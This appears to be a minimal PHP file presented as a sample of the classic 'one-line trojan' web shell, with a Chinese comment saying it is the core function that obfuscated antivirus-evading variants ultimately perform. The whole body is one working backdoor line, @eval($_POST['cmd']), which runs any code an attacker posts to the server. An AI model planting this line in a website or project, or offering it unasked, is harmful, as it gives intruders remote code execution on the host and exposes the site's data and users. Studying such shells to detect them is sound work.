// 最原始的一句话木马，也是一句话免杀木马经过各种混淆后最终实现的功能
<?php
@eval($_POST['cmd']);
?>